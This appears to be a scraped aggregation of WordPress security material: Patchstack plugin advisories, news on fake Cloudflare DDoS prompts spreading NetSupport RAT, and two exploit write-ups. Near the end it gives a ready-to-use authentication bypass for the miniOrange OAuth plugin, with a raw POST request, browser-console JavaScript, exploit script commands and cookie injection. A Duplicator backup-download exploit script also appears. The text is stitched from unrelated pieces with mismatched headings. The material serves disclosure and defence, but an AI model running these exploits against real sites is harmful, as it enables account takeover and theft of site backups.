Unauthenticated plugin settings change vulnerability in 59sec THE Leads Management System: 59sec LITE plugin <= 3.4.1 at WordPress.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of August 12, 2022 and is not available for download. This closure is temporary, pending a full review.

Totally love it. When are you launching Windows Mobile app? Some of my sales persons are using Nokia Lumia phones and we really need them. By the way, we upgraded at 59sec PRO and we are very happy as well.

Best feature on wordpres for a guy that wants to make some sales. Indeed, is ideal for companies with several sales agents, but even for small sites, like mine, is GREAT. 🙂 You should promote yourself more!

I used 59sec lite for an ecommerce site I did for a client of mine. Even if it helps less when it comes to ecommerce for leads, it's very usefull to answer questions that leads to purchase. I like it.

Read all 6 reviews

“THE Leads Management System: 59sec LITE” is open source software. The following people have contributed to this plugin.

Contributors

*    59sec

CVE-2022-35242: THE Leads Management System: 59sec LITE

Authenticated Arbitrary Settings Update vulnerability in YooMoney ?Kassa ??? WooCommerce plugin <= 2.3.0 at WordPress.

 Verified

 Fixed

**5.4**

CVSS 3.1 score Medium severity

Monitoring Coming soon

PSID 

79f457e901cf

Classification 

Other Vulnerability Type

OWASP Top 10 

A5: Broken Access Control

Required privilege 

Requires subscriber or higher role user authentication.

Publicly disclosed

2022-07-29

**Details**

Authenticated Arbitrary Settings Update vulnerability discovered by ptsfence (Patchstack Alliance) in WordPress ЮKassa для WooCommerce plugin (versions <= 2.3.0).

**Solution**

Update the WordPress ЮKassa для WooCommerce plugin to the latest available version (at least 2.3.1).

**References**

Changeset

CVE-2022-34868: WordPress ЮKassa для WooCommerce plugin <= 2.3.0 - Authenticated Arbitrary Settings Update vulnerability - Patchstack

Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in 8 Degree Themes otification Bar for WordPress plugin <= 1.1.8 at WordPress.

 Verified

 Not fixed

**6.1**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Software

Notification Bar for WordPress

Vulnerable versions

<= 1.1.8

PSID 

5d0d17f12155

Classification 

Cross Site Scripting (XSS)

OWASP Top 10 

A7: Cross-Site Scripting (XSS)

Required privilege 

Can be exploited remotely without any authentication.

Publicly disclosed

2022-08-12

**Details**

Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability discovered by ptsfence (Patchstack Alliance) in WordPress Notification Bar for WordPress plugin (versions <= 1.1.8).

**Solution**

Deactivate and delete. This plugin has been closed as of August 12, 2022 and is not available for download. This closure is temporary, pending a full review.

**References**

CVE-2022-29476: WordPress Notification Bar for WordPress plugin <= 1.1.8 - Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability - Patchstack

Authenticated (author+) Stored Cross-Site Scripting (XSS) vulnerability in dmitrylitvinov Uploading SVG, WEBP and ICO files plugin <= 1.0.1 at WordPress.

 Verified

 Not fixed

**4.8**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Software

Uploading SVG, WEBP and ICO files

Vulnerable versions

<= 1.0.1

PSID 

6ae7f03579ae

Classification 

Cross Site Scripting (XSS)

OWASP Top 10 

A7: Cross-Site Scripting (XSS)

Required privilege 

Requires author or higher role user authentication.

Publicly disclosed

2022-08-12

**Details**

Authenticated Stored Cross-Site Scripting (XSS) vulnerability via malicious SVG file upload discovered by Universe (Patchstack Alliance) in WordPress Uploading SVG, WEBP and ICO files plugin (versions <= 1.0.1).

**Solution**

No patched version available.

**References**

CVE-2022-34648: WordPress Uploading SVG, WEBP and ICO files plugin <= 1.0.1 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability - Patchstack

Multiple Authenticated (contributor+) Persistent Cross-Site Scripting (XSS) vulnerabilities in W3 Eden Download Manager plugin <= 3.2.48 at WordPress.

CVE-2022-34658: Download Manager

WordPress Duplicator plugin version 1.4.7.2 suffers from a backup disclosure vulnerability.

    ## Title: WordPress Plugin Duplicator 1.4.7.2 - Unauthenticated Backup Download## Author: nu11secur1ty## Date: 08.23.2022## Vendor: https://wordpress.org/## Software: https://wordpress.org/plugins/duplicator/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2## Description:The WordPress Plugin Duplicator 1.4.7.2 suffers from UnauthenticatedBackup Download, after an update from the 1.4.7.1 version.The attacker can download all archive information from the system byusing this vulnerability!Status: CRITICAL[+] Exploit:```python#!/usr/bin/python# Author nu11secur1tyfrom selenium import webdriverimport timeimport osprint("Test if you can access the directory\n")time.sleep(5)os.system('curl http://pwned-host.com/wordpress/wp-content/backups-dup-lite/')target=input("Give the name of the archive...\n")driver = webdriver.Chrome()driver.get('http://pwned-host.com/wordpress/wp-content/backups-dup-lite/'+ target)```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2)## Proof and Exploit:[href](https://streamable.com/x0cvjh)

WordPress Duplicator 1.4.7.2 Backup Disclosure

Security vendor Sucuri says adversaries are injecting malicious JavaScript into numerous WordPress websites that triggers phony bot-related checks.

Threat actors are spoofing Cloudflare DDoS bot-checks in an attempt to drop a remote-access Trojan (RAT) on systems belonging to visitors to some previously compromised WordPress websites.

Researchers from Sucuri recently spotted the new attack vector while investigating a surge in JavaScript injection attacks targeting WordPress sites. They observed the attackers injecting a script into the WordPress websites that triggered a fake prompt claiming to be the website verifying if a site visitor is human or a DDoS bot.

Many Web application firewalls (WAFs) and content distribution network services routinely serve up such alerts as part of their DDoS protection service. Sucuri observed this new JavaScript on WordPress sites triggering a fake Cloudflare DDoS protection pop-up.

Users who clicked on the fake prompt to access the website ended up with a malicious .iso file downloaded onto their systems. They then received a new message asking them to open the file so they can receive a verification code for accessing the website. "Since these types of browser checks are so common on the web many users wouldn't think twice before clicking this prompt to access the website they're trying to visit," Sucuri wrote. "What most users do not realize is that this file is in fact a remote access trojan, currently flagged by 13 security vendors at the time of this post."

**Dangerous RAT**

Sucuri identified the remote-access Trojan as NetSupport RAT, a malware tool that ransomware actors have previously used to footprint systems before delivering ransomware on them. The RAT has also been used to drop Racoon Stealer, a well-known information stealer that briefly dropped out of sight earlier this year before surging back on the threat landscape in June. Racoon Stealer surfaced in 2019 and was one of the most prolific information stealers of 2021. Threat actors have distributed it in a variety of ways, including malware-as-a-service models and by planting it on websites selling pirated software. With the fake Cloudflare DDoS protection prompts, threat actors now have a new way of distributing the malware.

"Threat actors, particularly when phishing, will use anything that looks legitimate to fool users," says John Bambenek, principal threat hunter at Netenrich. As people get used to mechanisms like Captcha's for detecting and blocking bots, it makes sense for threat actors to use those same mechanisms to try to fool users, he says. "This not only can be used to get people to install malware, but could be used for 'credential checks' to steal credentials of major cloud services (such as) Google, Microsoft, and Facebook," Bambenek says.

Ultimately, website operators need a way to tell the difference between a real user and a synthetic one, or a bot, he notes. But often the more effective the tools for detecting bots get, the harder they get for users to decode, Bambenek adds.

Charles Conley, senior cyber security researcher at nVisium, says that using content spoofing of the kind that Sucuri observed to deliver a RAT is not especially new. Cybercriminals have routinely spoofed business-related apps and services from companies such as Microsoft, Zoom, and DocuSign to deliver malware and trick users into executing all kinds of unsafe software and actions.

However, with browser-based spoofing attacks, default settings on browsers such as Chrome that hide the full URL or operating systems like Windows that hide file extensions can make it harder for even discerning individuals to tell what they're downloading and where it's from, Conley says.

Fake DDoS Protection Alerts Distribute Dangerous RAT

By Waqas
The malware dropped in this attack is the NetSupport RAT which was previously identified in malicious MS Word documents.
This is a post from HackRead.com Read the original post: Attackers using fake Cloudflare DDoS protection popups to distribute malware

A new threat campaign has been discovered by cybersecurity researchers at Sucuri, in which attackers are using fake **Cloudflare DDoS protection** popups to distribute malware.

According to Sucuri’s findings, the attack starts with malicious JavaScript that targets WordPress sites. Users are tricked into downloading malware that leads to the hijacking of their devices.

The victim unknowingly downloads a remote access trojan (**RAT**), which has been flagged by at least thirteen security vendors so far.

**How does the Attack Take Place?**

Researchers noted that attackers hack **poorly protected WordPress websites** and add an obfuscated JavaScript payload. This payload displays a fake DDoS protection page. The visitor is requested to click on a button to bypass the DDoS protection screen, but when clicked, it downloads a file to the computer (‘security\_install.iso).

Then the visitor is asked to open this file, which pretends to be a DDOS GUARD application. There’s a code provided that the victim must enter, and another file appears (security\_install.exe). This file is a Windows shortcut that runs a PowerShell command from the Debug.txt file. Several other scripts are run, and the fake DDoS code is displayed.

However, in the background, the **NetSupport RAT** is installed. This RAT is commonly and extensively used in malware campaigns nowadays. The malicious scripts also download the Raccoon Stealer 2.0- a password-stealing trojan.

Fake Cloudflare page dropping malware

This malware steals cookies, passwords, credit card info, auto-fill data, and a wide range of cryptocurrency wallets. It can also perform file exfiltration and captures screenshots of the victim’s display screen. Regarding the possible threats/dangers of this campaign, here’s what the researchers wrote in their **report**:

> “The infected computer could be used to pilfer social media or banking credentials, detonate ransomware, or even entrap the victim into a nefarious ‘slave’ network, extort the computer owner, and violate their privacy – all depending on what the attackers decide to do with the compromised device.”

**What are DDoS Protection Pages?**

You may often come across DDoS Protection pages while browsing the web. These pages are linked with WAF/CDN services that perform browser performance checks and verify if the site visitor is a human, bot, or part of a **DDoS attack**.

These pages usually don’t affect users as they perform a simple check or request for a skill test before proceeding to their desired website/webpage. But, in the recently discovered campaign, JavaScript injections are used in WordPress sites to create fake DDoS protection popups.

**How to Stay Protected?**

Site admins must always check their WordPress sites’ theme files because this is the most widely exploited feature in this campaign and regularly update the software, use 2FA and strong passwords, and **deploy a firewall**.

Furthermore, it is essential to use a file integrity monitoring system as it can quickly catch JavaScript injections and prevent the website from becoming a malware distribution point.

On the other hand, users should enable strict script blocking settings on the browser and keep in mind that they don’t need to download ISO files as anti-DDoS procedures.

1.  **Google Fended Off Largest Ever Layer 7 DDoS Attack**
2.  **DDoS booter customers received warning letters from Dutch police**
3.  **DDoS App Meant to Hit Russia Infected Phones of Ukrainian Activists**
4.  **Canadian firm VoIP.ms hit by non-stop extortion-based DDoS attacks**
5.  **Tiny Mantis Botnet Can Launch More Powerful DDoS Attacks Than Mirai**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Attackers using fake Cloudflare DDoS protection popups to distribute malware

Authentication Bypass vulnerability in miniOrange OAuth 2.0 client for SSO plugin <= 1.11.3 at WordPress.

 Verified

 Fixed

**5.9**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Find out about vulnerable plugins in your websites for free.

 Scan your website 

Software

 OAuth 2.0 client for SSO

Type

Plugin

Vulnerable versions

 <= 1.11.3

Fixed in

 1.11.4

PSID 

f26589749d3c

CVE ID 

 CVE-2022-34858

Classification 

Bypass Vulnerability

OWASP Top 10 

A2: Broken Authentication

Credits

 Lana Codes

Publicly disclosed

2022-08-02

**Details**

Authentication Bypass vulnerability discovered by Lana Codes in WordPress OAuth 2.0 client for SSO plugin (versions <= 1.11.3).

**Solution**

Update the WordPress OAuth 2.0 client for SSO plugin to the latest available version (at least 1.11.4).

**References**

CVE-2022-34858: WordPress OAuth 2.0 client for SSO plugin <= 1.11.3 - Authentication Bypass vulnerability - Patchstack

Authentication Bypass vulnerability in miniOrange OAuth 2.0 client for SSO plugin <= 1.11.3 at WordPress.



The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the client’s website.

**Let’s check the plugin**

The mo_oauth_login_validate() function includes the following request handling:

    if ( isset( $_REQUEST['option'] ) and strpos( $_REQUEST['option'], 'mooauth' ) !== false ) {
    
    	$user_email = '';
    	if ( array_key_exists( 'email', $_POST ) ) {
    		$user_email = sanitize_email( $_POST['email'] );
    	}
    	
    	if ( $user_email ) {
    		if ( email_exists( $user_email ) ) { // user is a member
    			$user    = get_user_by( 'email', $user_email );
    			$user_id = $user->ID;
    			wp_set_auth_cookie( $user_id, true );
    		} else { // this user is a guest
    			$random_password = wp_generate_password( 10, false );
    			$user_id         = wp_create_user( $user_email, $random_password, $user_email );
    			wp_set_auth_cookie( $user_id, true );
    		}
    	}
    	wp_redirect( home_url() );
    	exit;
    }

We can see from the code that if we specify $_POST['email'], the plugin will log the user in using the wp_set_auth_cookie() function. No verification or authentication. Nothing.

The other problem with the plugin is that if we give an email address in the request that does not exist in the database, it will create a new user, even if registration on the WordPress website is not enabled.

**Let’s see how we can exploit this vulnerability**

We only need to send a POST request to exploit this vulnerability.

The HTTP request to the https://lana.solutions/vdb/miniorange-oauth-client/ which is a test WordPress website:

    POST /vdb/miniorange-oauth-client/ HTTP/1.1
    Host: lana.solutions
    Content-Type: application/x-www-form-urlencoded
    
    option=mooauth&[email protected]

Let’s try it in the easiest way. I created a JavaScript code for the exploit that sends a POST request:

So we can even do this through a browser by opening the client’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/, then going to the console and entering the following code:

    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://lana.solutions/vdb/miniorange-oauth-client/', true);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.onload = function() {
    	window.location.href = 'https://lana.solutions/vdb/miniorange-oauth-client/wp-admin/';
    }
    xhr.send('option=mooauth&[email protected]');

After successful login, the script will redirect us to the WordPress admin.

**The exploit script**

I created a Python script that returns the WordPress logged\_in cookie:

Source: miniorange\_oauth\_client\_plugin\_vdb\_get\_exploit\_cookie.py

How to use:

    python3 miniorange_oauth_client_plugin_vdb_get_exploit_cookie.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --email="[email protected]"

Run the above command in the Linux terminal.

We get something like this:

    wordpress_logged_in_7c51fdb9c753be4972c4c2d647b5ded1=test%7C1656911674%7C2PsqjZ8FHWAqXOhJFcIU7yQPaQFOwVIpOfdZmQEyavx%7C940bbe2d2e3736724984b401f8f829811e541ffe3eb948f407aeeaae11f423f6

Then all we have to do is use a cookie, such as JavaScript, in the browser console in the client’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/

    document.cookie="wordpress_logged_in_7c51fdb9c753be4972c4c2d647b5ded1=test%7C1656911674%7C2PsqjZ8FHWAqXOhJFcIU7yQPaQFOwVIpOfdZmQEyavx%7C940bbe2d2e3736724984b401f8f829811e541ffe3eb948f407aeeaae11f423f6"; location.reload();

**The professional exploit script**

I also created a Python script with Selenium that exploits the vulnerability and automatically opens the webpage in Google Chrome:

Source: miniorange\_oauth\_client\_plugin\_vdb\_exploit\_with\_selenium.py

How to use:

    python3 miniorange_oauth_client_plugin_vdb_exploit_with_selenium.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --email="[email protected]"

Run the above command in the Linux (desktop version) terminal.

**Try it**

Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities, so you can only get low level access to the website.

Client: https://lana.solutions/vdb/miniorange-oauth-client/

Server: https://lana.solutions/vdb/miniorange-oauth-server/

**Additional tests**

I created a Postman request for exploit: Postman Web – MiniOrange Auth Request

Can be used by anyone after fork. The required variables are stored in the collection.

Tag

#wordpress